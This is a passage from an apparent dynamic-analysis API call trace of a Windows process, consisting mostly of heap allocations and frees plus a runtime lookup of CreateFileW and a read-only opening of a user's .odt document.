returned 1 [0077.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0077.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0077.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0077.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0077.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0077.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0077.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0077.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.514] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0077.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0077.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0077.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0077.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0077.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0077.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0077.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0077.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0077.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0077.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0077.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0077.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0077.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0077.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0077.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0077.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0077.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0077.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0077.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0077.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0077.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0077.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0077.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0077.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0077.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0077.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0077.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0077.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0077.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0077.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0077.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0077.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0077.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.517] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0077.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0077.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6d0 [0077.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca6d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0077.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.518] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0077.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0077.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0077.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0077.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0077.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0077.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0077.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0077.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0077.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0077.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0077.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0077.518] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\O8- 8r.odt" (normalized: "c:\\users\\fd1hvy\\documents\\o8- 8r.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0077.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0077.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0077.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0077.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0077.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0077.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0077.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0077.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0077.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369d70 [0077.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0077.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0077.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0077.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0077.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0077.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0077.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0077.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0077.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0077.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0077.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0077.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0077.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0077.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0077.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0077.520] FreeLibrary (hLibModule=0x772d0000) returned 1 [0077.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0077.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0077.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0077.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0077.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0077.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.522] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0077.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.522] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0077.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0077.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0077.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.522] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0077.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0077.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0077.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0077.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0077.523] HeapFree (in: hHeap=0x1780000, 